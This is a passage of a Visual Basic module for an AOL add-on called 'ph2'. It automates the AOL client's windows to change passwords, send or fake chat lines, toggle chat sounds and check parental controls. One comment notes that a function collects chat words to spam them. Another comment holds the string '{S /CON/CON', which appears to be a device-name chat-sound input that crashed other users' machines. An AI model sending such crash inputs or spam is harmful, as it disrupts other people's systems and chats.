  631. Call cChatSend("• pH2 · Entered " + GetText(FindRoom&) + " · Tries: " & lngTries& & "")
  632. End If
  633. End Sub
  634.  
  635. Public Sub ChangePassword(oldpw As String, newpw As String)
  636. 'changes users password
  637. Dim aol As Long, mdi As Long, cWin As Long, cButton As Long, cStatic As Long, cButCancel As Long
  638. Dim cpWin As Long, cpEditSN As Long, cpEditPW As Long, cpEditPW2 As Long, cpButton As Long, msgWin As Long, MsgButton As Long
  639.  
  640. If Len(newpw$) < 6& Or Len(newpw$) > 8& Then Exit Sub
  641.  
  642. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  643. Call ChangePassword25(oldpw$, newpw$)
  644. Exit Sub
  645. End If
  646.  
  647. aol& = FindWindow("AOL Frame25", vbNullString)
  648. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  649.  
  650. Call ToolKeyword("password")
  651.  
  652. Do
  653. DoEvents
  654. cWin& = FindWindow("_AOL_Modal", vbNullString)
  655. cButton& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  656. 'cButton& = FindWindowEx(cWin&, cButCancel&, "_AOL_Icon", vbNullString)
  657. cStatic& = FindWindowEx(cWin&, 0&, "_AOL_Static", vbNullString)
  658. Loop Until cWin& <> 0& And cButton& <> 0& And cStatic& <> 0&
  659.  
  660. pause (0.2)
  661.  
  662. Call SendMessage(cButton&, WM_LBUTTONDOWN, 0&, 0&)
  663. Call SendMessage(cButton&, WM_LBUTTONUP, 0&, 0&)
  664.  
  665. Do
  666. DoEvents
  667. cpWin& = FindWindow("_AOL_Modal", "Change Your Password")
  668. cpEditSN& = FindWindowEx(cpWin&, 0&, "_AOL_Edit", vbNullString)
  669. cpEditPW& = FindWindowEx(cpWin&, cpEditSN&, "_AOL_Edit", vbNullString)
  670. cpEditPW2& = FindWindowEx(cpWin&, cpEditPW&, "_AOL_Edit", vbNullString)
  671. cpButton& = FindWindowEx(cpWin&, 0&, "_AOL_Icon", vbNullString)
  672. Loop Until cpWin& <> 0& And cpEditSN& <> 0& And cpEditPW& <> 0& And cpEditPW2& <> 0& And cpButton& <> 0&
  673.  
  674. Call SendMessageByString(cpEditSN&, WM_SETTEXT, 0&, oldpw$)
  675. Call SendMessageByString(cpEditPW&, WM_SETTEXT, 0&, newpw$)
  676. Call SendMessageByString(cpEditPW2&, WM_SETTEXT, 0&, newpw$)
  677.  
  678. Call SendMessage(cpButton&, WM_LBUTTONDOWN, 0&, 0&)
  679. Call SendMessage(cpButton&, WM_LBUTTONUP, 0&, 0&)
  680.  
  681. Do
  682. DoEvents
  683. msgWin& = FindWindow("#32770", "America Online")
  684. MsgButton& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  685. Loop Until msgWin& <> 0& And MsgButton& <> 0&
  686.  
  687. Call SendMessage(MsgButton&, WM_KEYDOWN, VK_SPACE, 0&)
  688. Call SendMessage(MsgButton&, WM_KEYUP, VK_SPACE, 0&)
  689.  
  690. Call SendMessage(cButCancel&, WM_LBUTTONDOWN, 0&, 0&)
  691. Call SendMessage(cButCancel&, WM_LBUTTONUP, 0&, 0&)
  692.  
  693. Call ModalKill
  694. End Sub
  695.  
  696. Public Function AOLnumba() As String
  697. 'returns w/ the value aol thePublic Function AOLnumba() As String
  698. 'current aol version.
  699. 'outcomes:
  700. ' 2.5
  701. ' 3
  702. ' 4
  703. ' 5
  704. Dim aol As Long, gMenu As Long, Mnu As Long
  705. Dim sMenu As Long, sItem As Long, mString As String
  706. Dim fString As Long, tb As Long, TBar As Long
  707. Dim tCombo As Long, tEdit As Long
  708.  
  709. aol& = FindWindow("AOL Frame25", vbNullString)
  710. tb& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  711. TBar& = FindWindowEx(tb&, 0&, "_AOL_Toolbar", vbNullString)
  712. tCombo& = FindWindowEx(TBar&, 0&, "_AOL_Combobox", vbNullString)
  713. tEdit& = FindWindowEx(tCombo&, 0&, "Edit", vbNullString)
  714.  
  715. If tEdit& <> 0& And tCombo& <> 0& Then
  716. gMenu& = GetMenu(aol&)
  717.  
  718. sMenu& = GetSubMenu(gMenu&, 4&)
  719. sItem& = GetMenuItemID(sMenu&, 9&)
  720. mString$ = String$(100, " ")
  721.  
  722. fString& = GetMenuString(sMenu&, sItem&, mString$, 100, 1)
  723.  
  724. If InStr(1, LCase(mString$), LCase("&What's New in AOL 5.0")) <> 0& Then
  725. AOLnumba = "five"
  726. Else
  727. AOLnumba = "four"
  728. End If
  729. Else
  730. aol& = FindWindow("AOL Frame25", vbNullString)
  731. gMenu& = GetMenu(aol&)
  732.  
  733. Mnu& = GetMenuItemCount(GetMenu(aol&))
  734. If Mnu& = 8 Then
  735. sMenu& = GetSubMenu(gMenu&, 1)
  736. sItem& = GetMenuItemID(sMenu&, 8)
  737. mString$ = String$(100, " ")
  738. Else
  739. sMenu& = GetSubMenu(gMenu&, 0)
  740. sItem& = GetMenuItemID(sMenu&, 8)
  741. mString$ = String$(100, " ")
  742. End If
  743.  
  744. fString& = GetMenuString(sMenu&, sItem&, mString$, 100, 1)
  745.  
  746. If InStr(1, LCase(mString$), LCase("&LOGGING...")) <> 0& Then
  747. AOLnumba = "2.5"
  748. Else
  749. AOLnumba = "three"
  750. End If
  751. End If
  752. End Function
  753.  
  754. Public Sub ChangePassword25(oldpw As String, newpw As String)
  755. 'changes user's password
  756. Dim aol As Long, mdi As Long, cWin As Long, cButton As Long, cButCancel As Long, cStatic As Long
  757. Dim cpWin As Long, cpEditSN As Long, cpEditPW As Long, cpEditPW2 As Long, cpButton As Long
  758. Dim msgWin As Long, MsgButton As Long, msgStatic As Long, MsgString As String
  759.  
  760. aol& = FindWindow("AOL Frame25", vbNullString)
  761. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  762.  
  763. Call KeyWord25("Password")
  764.  
  765. Do
  766. DoEvents
  767. cWin& = FindWindow("_AOL_Modal", vbNullString)
  768. cButton& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  769. cButCancel& = FindWindowEx(cWin&, cButton&, "_AOL_Icon", vbNullString)
  770. cStatic& = FindWindowEx(cWin&, 0&, "_AOL_Static", vbNullString)
  771. Loop Until cWin& <> 0& And cButton& <> 0& And cStatic& <> 0&
  772.  
  773. Call PostMessage(cButton&, WM_LBUTTONDOWN, 0&, 0&)
  774. Call PostMessage(cButton&, WM_LBUTTONUP, 0&, 0&)
  775.  
  776. Do
  777. DoEvents
  778. cpWin& = FindWindow("_AOL_Modal", "Change Your Password")
  779. cpEditSN& = FindWindowEx(cpWin&, 0&, "_AOL_Edit", vbNullString)
  780. cpEditPW& = FindWindowEx(cpWin&, cpEditSN&, "_AOL_Edit", vbNullString)
  781. cpEditPW2& = FindWindowEx(cpWin&, cpEditPW&, "_AOL_Edit", vbNullString)
  782. cpButton& = FindWindowEx(cpWin&, 0&, "_AOL_Icon", vbNullString)
  783. 'cpButton& = FindWindowEx(cpWin&, cpButton&, "_AOL_Icon", vbNullString)
  784. Loop Until cpWin& <> 0& And cpEditSN& <> 0& And cpEditPW& <> 0& And cpEditPW2& <> 0& And cpButton& <> 0&
  785.  
  786. Call SendMessageByString(cpEditSN&, WM_SETTEXT, 0&, oldpw$)
  787. Call SendMessageByString(cpEditPW&, WM_SETTEXT, 0&, newpw$)
  788. Call SendMessageByString(cpEditPW2&, WM_SETTEXT, 0&, newpw$)
  789.  
  790. Call SendMessage(cpButton&, WM_LBUTTONDOWN, 0&, 0&)
  791. Call SendMessage(cpButton&, WM_LBUTTONUP, 0&, 0&)
  792.  
  793. Do
  794. DoEvents
  795. msgWin& = FindWindow("#32770", "America Online")
  796. MsgButton& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  797. msgStatic& = FindWindowEx(msgWin&, 0&, "Static", vbNullString)
  798. msgStatic& = FindWindowEx(msgWin&, msgStatic&, "Static", vbNullString)
  799. MsgString$ = GetText(msgStatic&)
  800. Loop Until msgWin& <> 0& And MsgButton& <> 0& And MsgString$ <> ""
  801.  
  802. If InStr(1, MsgString$, "specify current password.") <> 0& Then
  803. Call PostMessage(MsgButton&, WM_KEYDOWN, VK_SPACE, 0&)
  804. Call PostMessage(MsgButton&, WM_KEYUP, VK_SPACE, 0&)
  805. ElseIf InStr(1, MsgString$, "is identical to your old password") <> 0& Then
  806. Call PostMessage(MsgButton&, WM_KEYDOWN, VK_SPACE, 0&)
  807. Call PostMessage(MsgButton&, WM_KEYUP, VK_SPACE, 0&)
  808. ElseIf InStr(1, MsgString$, "password has been changed") <> 0& Then
  809. pause (0.3)
  810.  
  811. Call SendMessage(cButCancel&, WM_LBUTTONDOWN, 0&, 0&)
  812. Call SendMessage(cButCancel&, WM_LBUTTONUP, 0&, 0&)
  813. End If
  814.  
  815. Call PostMessage(cButCancel&, WM_KEYDOWN, VK_SPACE, 0&)
  816. Call PostMessage(cButCancel&, WM_KEYUP, VK_SPACE, 0&)
  817.  
  818. End Sub
  819.  
  820. Public Function ChatLength() As Long
  821. 'gets the length of the
  822. 'text scrolled in the chat
  823. Dim cWin As Long, cCNTL As Long, Asdf As Long
  824.  
  825. If AOLVersion = "4" Or AOLVersion = "5" Then
  826. cWin& = FindRoom
  827. cCNTL& = FindWindowEx(cWin&, 0&, "RICHCNTL", vbNullString)
  828. Else
  829. cWin& = FindRoom25
  830. cCNTL& = FindWindowEx(cWin&, 0&, "_AOL_View", vbNullString)
  831. End If
  832.  
  833. If cCNTL& <> 0& Then
  834. ChatLength = SendMessage(cCNTL&, WM_GETTEXTLENGTH, 0&, 0&)
  835. End If
  836. End Function
  837.  
  838. Public Sub ChatManip(screenname As String, sentence As String)
  839. 'manipulates the user's
  840. 'chatwindow ONLY
  841. Dim rWin As Long, rCNTL As Long, rText As String, rString As String
  842.  
  843. rWin& = FindRoom&
  844.  
  845. If rWin& = 0& Then Exit Sub
  846.  
  847. rCNTL& = FindWindowEx(rWin&, 0&, "RICHCNTL", vbNullString)
  848. rString$ = vbCrLf + "" + screenname$ + ":" + Chr(9) + sentence$ + ""
  849.  
  850. Call SendMessageByString(rCNTL&, WM_SETTEXT, 0&, rString$)
  851. End Sub
  852.  
  853. Public Sub ChatManip25(screenname As String, sentence As String)
  854. 'manipulates the user's
  855. 'chatwindow ONLY
  856. Dim rWin As Long, rView As Long, rText As String, rString As String
  857.  
  858. rWin& = FindRoom25&
  859.  
  860. If rWin& = 0& Then Exit Sub
  861.  
  862. rView& = FindWindowEx(rWin&, 0&, "_AOL_View", vbNullString)
  863. rString$ = vbCrLf + "" + screenname$ + ":" + Chr(9) + sentence$ + ""
  864.  
  865. Call SendMessageByString(rView&, WM_SETTEXT, 0&, rString$)
  866. End Sub
  867.  
  868. Public Sub ChatNow()
  869. 'goes to lobby
  870. Call RunTBMenu(10&, 2&)
  871.  
  872. Do
  873. DoEvents
  874. Loop Until FindRoom& <> 0&
  875. End Sub
  876.  
  877. Public Function ChatRemoveSN() As String
  878. 'returns the vaule of the chat text w/o the screen names
  879. 'this function is usually just used to either
  880. 'have stuff to search for in m/d gathers
  881. 'or to spam the words gathered
  882. '(works for all aol's)
  883.  
  884. Dim StartingPoint As Long, EndingPoing As Long, LengthOfSn As Long, cSN As String
  885. Dim cCNTL As Long, cString As String, EndingPoint As Long, cView As Long
  886.  
  887. If FindRoom& = 0& And FindRoom25& = 0& Then ChatRemoveSN$ = "": Exit Function
  888.  
  889. If AOLVersion = "4" Or AOLVersion = "5" Then
  890. cCNTL& = FindWindowEx(FindRoom&, 0&, "RICHCNTL", vbNullString)
  891. cString$ = GetText(cCNTL&)
  892. Else
  893. cView& = FindWindowEx(FindRoom25&, 0&, "_AOL_View", vbNullString)
  894. cString$ = GetText(cView&)
  895. End If
  896.  
  897. If InStr(1, cString$, Chr(13)) = 0 Then ChatRemoveSN = "": Exit Function
  898. If InStr(1, cString$, Chr(9)) = 0 Then ChatRemoveSN = "": Exit Function
  899.  
  900. Do
  901. DoEvents
  902. StartingPoint& = InStr(1&, cString$, Chr(13))
  903. EndingPoint& = InStr(1&, cString$, Chr(9)) + 1&
  904. If EndingPoint& > StartingPoint& Then
  905. LengthOfSn& = EndingPoint& - StartingPoint&
  906. Else
  907. LengthOfSn& = StartingPoint& - EndingPoint&
  908. End If
  909. cSN$ = Mid(cString$, StartingPoint&, LengthOfSn&)
  910. cString$ = ReplaceText(cString$, cSN$, " ")
  911. Loop Until InStr(1&, cString$, Chr(13)) = 0& Or InStr(1&, cString$, Chr(9)) = 0&
  912.  
  913. ChatRemoveSN$ = cString$
  914.  
  915. End Function
  916.  
  917. Public Sub ChatSend(Text As String)
  918. 'sends text to the chat
  919. Dim rWin As Long, rRich As Long, rText As String
  920. Dim WaitSend As String, mode As String
  921.  
  922. mode$ = GetFromINI("ph2", "mode", App.Path + "\ph2.ini")
  923. If mode$ = "elite" Then
  924. Text$ = Text_Elite(Text$)
  925. ElseIf mode$ = "hacker" Then
  926. Text$ = Text_Hacker(Text$)
  927. ElseIf mode$ = "lcase" Then
  928. Text$ = LCase(Text$)
  929. ElseIf mode$ = "ucase" Then
  930. Text$ = UCase(Text$)
  931. ElseIf mode$ = "pig latin" Then
  932. Text$ = Text_PigLatin(Text$)
  933. ElseIf mode$ = "silent" Then
  934. Exit Sub
  935. ElseIf mode$ = "normal" Then
  936.  
  937. End If
  938.  
  939. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  940. Call ChatSend25(Text$)
  941. Exit Sub
  942. End If
  943.  
  944. If FindRoom& = 0& Or Text$ = "" Then Exit Sub
  945.  
  946. rWin& = FindRoom&
  947. rRich& = FindWindowEx(rWin&, 0&, "RICHCNTL", vbNullString)
  948. rRich& = FindWindowEx(rWin&, rRich&, "RICHCNTL", vbNullString)
  949. rText$ = GetText(rRich&)
  950. Call SendMessageByString(rRich&, WM_SETTEXT, 0&, "")
  951. Call SendMessageByString(rRich&, WM_SETTEXT, 0&, "<font face=""arial""></html>" + Text$)
  952. Do
  953. DoEvents
  954. Call SendMessageLong(rRich&, WM_CHAR, ENTER_KEY, 0&)
  955. WaitSend$ = GetText(rRich&)
  956. Loop Until WaitSend$ = ""
  957. Call SendMessageByString(rRich&, WM_SETTEXT, 0&, rText$)
  958. End Sub
  959.  
  960. Public Sub ChatSend25(Text As String)
  961. 'sends text to chat on aol 2.5 and 3.0
  962. Dim rWin As Long, rString As String, rEdit As Long
  963.  
  964. rWin& = FindRoom25
  965. If rWin& = 0& Or Text$ = "" Then Exit Sub
  966.  
  967. rEdit& = FindWindowEx(rWin&, 0&, "_AOL_Edit", vbNullString)
  968.  
  969. Call SendMessageByString(rEdit&, WM_SETTEXT, 0&, "")
  970. Call SendMessageByString(rEdit&, WM_SETTEXT, 0&, Text$)
  971.  
  972. Call SendMessageLong(rEdit&, WM_CHAR, ENTER_KEY, 0&)
  973.  
  974. End Sub
  975.  
  976. Public Sub ChatSendOH(Text As String)
  977. 'sends text to the chat.. overhead stylee
  978. Dim rWin As Long, rRich As Long, rText As String
  979. Dim WaitSend As String
  980.  
  981. If blnOHScroll = False Then Exit Sub
  982.  
  983. If FindRoom& = 0& Or Text$ = "" Then Exit Sub
  984.  
  985. rWin& = FindRoom&
  986. rRich& = FindWindowEx(rWin&, 0&, "RICHCNTL", vbNullString)
  987. rRich& = FindWindowEx(rWin&, rRich&, "RICHCNTL", vbNullString)
  988.  
  989. Call SendMessageByString(rRich&, WM_SETTEXT, 0&, "")
  990. Call SendMessageByString(rRich&, WM_SETTEXT, 0&, "" + Text$)
  991.  
  992. Do
  993. DoEvents
  994. Call SendMessageLong(rRich&, WM_CHAR, ENTER_KEY, 0&)
  995. WaitSend$ = GetText(rRich&)
  996. Loop Until WaitSend$ = ""
  997. End Sub
  998.  
  999. Public Sub ChatSendOH25(Text As String)
  1000. 'sends text to chat on aol 2.5 or 3.0
  1001. Dim rWin As Long, rString As String, rEdit As Long
  1002.  
  1003. If blnOHScroll = False Then Exit Sub
  1004.  
  1005. rWin& = FindRoom25&
  1006. If rWin& = 0& Or Text$ = "" Then Exit Sub
  1007.  
  1008. rEdit& = FindWindowEx(rWin&, 0&, "_AOL_Edit", vbNullString)
  1009.  
  1010. Call SendMessageByString(rEdit&, WM_SETTEXT, 0&, Chr(9) + Chr(160) + "" + Text$)
  1011.  
  1012. Call SendMessageLong(rEdit&, WM_CHAR, ENTER_KEY, 0&)
  1013.  
  1014. End Sub
  1015.  
  1016. Public Sub ChatSoundsOff()
  1017. 'turns chatsounds off
  1018. Dim aol As Long, mdi As Long, PrefWin As Long, PrefButton As Long
  1019. Dim moda As Long, CheckA As Long, CheckR As Long, OKButt As Long
  1020.  
  1021. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  1022. Call ChatSoundsOff25
  1023. Exit Sub
  1024. End If
  1025.  
  1026. aol& = FindWindow("AOL Frame25", vbNullString)
  1027. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1028.  
  1029. Call OpenPrefs
  1030.  
  1031. Do
  1032. DoEvents
  1033. PrefWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  1034. PrefButton& = FindWindowEx(PrefWin&, 0&, "_AOL_Icon", vbNullString)
  1035. Loop Until PrefWin& <> 0& And PrefButton& <> 0&
  1036.  
  1037. Call PostMessage(PrefButton&, WM_LBUTTONDOWN, 0&, 0&)
  1038. Call PostMessage(PrefButton&, WM_LBUTTONUP, 0&, 0&)
  1039.  
  1040. Do
  1041. DoEvents
  1042. moda& = FindWindow("_AOL_Modal", "General Preferences")
  1043. CheckA& = FindWindowEx(moda&, 0&, "_AOL_Checkbox", vbNullString)
  1044. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1045. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1046. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1047. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1048. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1049. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1050. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1051. OKButt& = FindWindowEx(moda&, 0&, "_AOL_Icon", vbNullString)
  1052. Loop Until moda& <> 0& And CheckA& <> 0& And OKButt& <> 0&
  1053.  
  1054. CheckR& = SendMessage(CheckA&, BM_GETCHECK, 0&, 0&)
  1055. If CheckR = 1& Then
  1056. Do
  1057. DoEvents
  1058. Call SendMessage(CheckA&, WM_LBUTTONDOWN, 0&, 0&)
  1059. Call SendMessage(CheckA&, WM_LBUTTONUP, 0&, 0&)
  1060. CheckR& = SendMessage(CheckA&, BM_GETCHECK, 0&, 0&)
  1061. Loop Until CheckR& = 0
  1062. End If
  1063.  
  1064. Call PostMessage(OKButt&, WM_LBUTTONDOWN, 0&, 0&)
  1065. Call PostMessage(OKButt&, WM_LBUTTONUP, 0&, 0&)
  1066.  
  1067. Call PostMessage(PrefWin&, WM_CLOSE, 0&, 0&)
  1068. End Sub
  1069.  
  1070. Public Sub ChatSoundsOff25()
  1071. 'turns chat sounds off
  1072. Dim aol As Long, mdi As Long, pWin As Long, pIcon As Long
  1073. Dim gpWin As Long, gpButton As Long, gpOK As Long
  1074.  
  1075. aol& = FindWindow("AOL Frame25", vbNullString)
  1076. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1077.  
  1078. Call RunMenuByString("preferences")
  1079.  
  1080. Do
  1081. DoEvents
  1082. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  1083. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  1084. If AOLVersion = "3" Then
  1085. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  1086. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  1087. End If
  1088. Loop Until pWin& <> 0& And pIcon& <> 0&
  1089.  
  1090. Call SendMessage(pIcon&, WM_LBUTTONDOWN, 0&, 0&)
  1091. Call SendMessage(pIcon&, WM_LBUTTONUP, 0&, 0&)
  1092.  
  1093. Do
  1094. DoEvents
  1095. gpWin& = FindWindow("_AOL_Modal", "General Preferences")
  1096. gpButton& = FindWindowEx(gpWin&, 0&, "_AOL_Button", "Enable chat room sounds")
  1097. gpOK& = FindWindowEx(gpWin&, 0&, "_AOL_Button", "OK")
  1098. Loop Until gpWin& <> 0& And gpButton& <> 0& And gpOK& <> 0&
  1099.  
  1100. Do While SendMessage(gpButton&, BM_GETCHECK, 0&, 0&) = 0&
  1101. DoEvents
  1102. Call SendMessage(gpButton&, WM_KEYDOWN, VK_SPACE, 0&)
  1103. Call SendMessage(gpButton&, WM_KEYUP, VK_SPACE, 0&)
  1104. Loop
  1105.  
  1106. Call SendMessage(gpOK&, WM_KEYDOWN, VK_SPACE, 0&)
  1107. Call SendMessage(gpOK&, WM_KEYUP, VK_SPACE, 0&)
  1108.  
  1109. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  1110.  
  1111. End Sub
  1112.  
  1113. Public Sub ChatSoundsOn()
  1114. 'turns chatsounds on
  1115. Dim aol As Long, mdi As Long, PrefWin As Long, PrefButton As Long
  1116. Dim moda As Long, CheckA As Long, CheckR As Long, OKButt As Long
  1117.  
  1118. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  1119. Call ChatSoundsOn25
  1120. Exit Sub
  1121. End If
  1122.  
  1123. aol& = FindWindow("AOL Frame25", vbNullString)
  1124. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1125.  
  1126. Call OpenPrefs
  1127.  
  1128. Do
  1129. DoEvents
  1130. PrefWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  1131. PrefButton& = FindWindowEx(PrefWin&, 0&, "_AOL_Icon", vbNullString)
  1132. Loop Until PrefWin& <> 0& And PrefButton& <> 0&
  1133.  
  1134. Call PostMessage(PrefButton&, WM_LBUTTONDOWN, 0&, 0&)
  1135. Call PostMessage(PrefButton&, WM_LBUTTONUP, 0&, 0&)
  1136.  
  1137. Do
  1138. DoEvents
  1139. moda& = FindWindow("_AOL_Modal", "General Preferences")
  1140. CheckA& = FindWindowEx(moda&, 0&, "_AOL_Checkbox", vbNullString)
  1141. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1142. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1143. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1144. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1145. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1146. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1147. CheckA& = FindWindowEx(moda&, CheckA&, "_AOL_Checkbox", vbNullString)
  1148. OKButt& = FindWindowEx(moda&, 0&, "_AOL_Icon", vbNullString)
  1149. Loop Until moda& <> 0& And CheckA& <> 0& And OKButt& <> 0&
  1150.  
  1151. CheckR& = SendMessage(CheckA&, BM_GETCHECK, 0&, 0&)
  1152. If CheckR = 1& Then
  1153. Do
  1154. DoEvents
  1155. Call SendMessage(CheckA&, WM_LBUTTONDOWN, 0&, 0&)
  1156. Call SendMessage(CheckA&, WM_LBUTTONUP, 0&, 0&)
  1157. CheckR& = SendMessage(CheckA&, BM_GETCHECK, 0&, 0&)
  1158. Loop Until CheckR& = 1
  1159. End If
  1160.  
  1161. Call PostMessage(OKButt&, WM_LBUTTONDOWN, 0&, 0&)
  1162. Call PostMessage(OKButt&, WM_LBUTTONUP, 0&, 0&)
  1163.  
  1164. Call PostMessage(PrefWin&, WM_CLOSE, 0&, 0&)
  1165. End Sub
  1166.  
  1167. Public Sub ChatSoundsOn25()
  1168. 'turns chatsounds on.. {S /CON/CON
  1169. Dim aol As Long, mdi As Long, pWin As Long, pIcon As Long
  1170. Dim gpWin As Long, gpButton As Long, gpOK As Long
  1171.  
  1172. aol& = FindWindow("AOL Frame25", vbNullString)
  1173. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1174.  
  1175. Call RunMenuByString("preferences")
  1176.  
  1177. Do
  1178. DoEvents
  1179. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  1180. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  1181. If AOLVersion = "3" Then
  1182. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  1183. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  1184. End If
  1185. Loop Until pWin& <> 0& And pIcon& <> 0&
  1186.  
  1187. Call SendMessage(pIcon&, WM_LBUTTONDOWN, 0&, 0&)
  1188. Call SendMessage(pIcon&, WM_LBUTTONUP, 0&, 0&)
  1189.  
  1190. Do
  1191. DoEvents
  1192. gpWin& = FindWindow("_AOL_Modal", "General Preferences")
  1193. gpButton& = FindWindowEx(gpWin&, 0&, "_AOL_Button", "Enable chat room sounds")
  1194. gpOK& = FindWindowEx(gpWin&, 0&, "_AOL_Button", "OK")
  1195. Loop Until gpWin& <> 0& And gpButton& <> 0& And gpOK& <> 0&
  1196.  
  1197. Do While SendMessage(gpButton&, BM_GETCHECK, 0&, 0&) = 1&
  1198. DoEvents
  1199. Call SendMessage(gpButton&, WM_KEYDOWN, VK_SPACE, 0&)
  1200. Call SendMessage(gpButton&, WM_KEYUP, VK_SPACE, 0&)
  1201. Loop
  1202.  
  1203. Call SendMessage(gpOK&, WM_KEYDOWN, VK_SPACE, 0&)
  1204. Call SendMessage(gpOK&, WM_KEYUP, VK_SPACE, 0&)
  1205.  
  1206. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  1207.  
  1208. End Sub
  1209.  
  1210. Public Sub ChatTextToList(list As ListBox, Optional DupeCheck As Boolean)
  1211. 'adds almost every word said in chat to a listbox
  1212. Dim ctString As String, FirstComma As Long, SecondComma As Long
  1213. Dim SN As String, DupeFound As Boolean, dupeLong As Long
  1214.  
  1215. ctString$ = ChatRemoveSN
  1216.  
  1217. ctString$ = ReplaceText(ctString$, " ", " ")
  1218.  
  1219. FirstComma = 1
  1220. SecondComma = 1
  1221. Do While InStr(FirstComma + 1, ctString$, " ") <> 0&
  1222. DupeFound = False
  1223. FirstComma = InStr(FirstComma, ctString$, " ")
  1224.  
  1225. SecondComma = InStr(FirstComma + 1, ctString$, " ")
  1226. SN$ = Mid(ctString$, FirstComma + 1, SecondComma - FirstComma)
  1227. SN$ = SN$
  1228. SN$ = ReplaceText(SN$, Chr(9), "")
  1229. If Trim(SN$) <> "" Then
  1230. If DupeCheck = True Then
  1231. For dupeLong& = 0 To list.ListCount - 1
  1232. If LCase(TrimSpaces(list.list(dupeLong&))) = LCase(TrimSpaces(SN$)) Then DupeFound = True
  1233. Next dupeLong&
  1234.  
  1235. If DupeFound = False Then
  1236. list.AddItem Trim(SN$)
  1237. End If
  1238. Else
  1239. list.AddItem Trim(SN$)
  1240. End If
  1241. End If
  1242. FirstComma = SecondComma
  1243. Loop
  1244. End Sub
  1245.  
  1246. Public Sub cChatManip25(sentence As String)
  1247. 'manips the chat.. made for '.commands'
  1248. Dim rWin As Long, rView As Long, rText As String, rString As String, Trigger As String
  1249.  
  1250. Trigger$ = GetFromINI("ph2", "trigger", App.Path + "\ph2.ini")
  1251. If Trigger$ = "" Then Trigger$ = "."
  1252.  
  1253. rWin& = FindRoom25&
  1254.  
  1255. If rWin& = 0& Then Exit Sub
  1256.  
  1257. rView& = FindWindowEx(rWin&, 0&, "_AOL_View", vbNullString)
  1258. rString$ = vbCrLf + "ph2:" + Chr(9) + "" + sentence$ + ""
  1259.  
  1260. Call SendMessageByString(rView&, WM_SETTEXT, 0&, rString$)
  1261. End Sub
  1262.  
  1263. Public Sub cChatSend(Text As String)
  1264. If ccomSilent = False Then
  1265. Call ChatSend(Text$)
  1266. End If
  1267. End Sub
  1268. Public Sub CenterForm(frm As Form)
  1269. 'self explanatory
  1270. frm.Left = (Screen.Width / 2&) - (frm.Width / 2&)
  1271. frm.Top = (Screen.Height / 2&) - (frm.Height / 2&)
  1272. End Sub
  1273.  
  1274.  
  1275.  
  1276. Public Function CheckIfForeign() As Boolean
  1277. 'self explanatory
  1278. Dim Wel As Long, CNTL As Long, strCNTL As String
  1279.  
  1280. Wel& = FindWelcome&
  1281.  
  1282. If Wel& = 0& Then
  1283. CheckIfForeign = False
  1284. Exit Function
  1285. End If
  1286.  
  1287. CNTL& = FindWindowEx(Wel&, 0&, "RICHCNTL", vbNullString)
  1288. strCNTL$ = GetText(CNTL&)
  1289.  
  1290. If InStr(1, LCase(strCNTL$), "come check out the computing area!") <> 0& Then
  1291. CheckIfForeign = True
  1292. Else
  1293. CheckIfForeign = False
  1294. End If
  1295. End Function
  1296.  
  1297. Public Function CheckIfMaster() As Boolean
  1298. 'checks if user is on a master account
  1299. '[works for all aol's]
  1300. Dim aol As Long, mdi As Long, pcWin As Long, pcIcon As Long
  1301. Dim mstrWin As Long, mstrIcon As Long, subwin As Long, subIcon As Long
  1302.  
  1303. aol& = FindWindow("AOL Frame25", vbNullString)
  1304. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1305.  
  1306. Call Keyword("aol://4344:1580.prntcon.12263709.564517913")
  1307.  
  1308. Do
  1309. DoEvents
  1310. pcWin& = FindWindowEx(mdi&, 0&, "AOL Child", " Parental Controls")
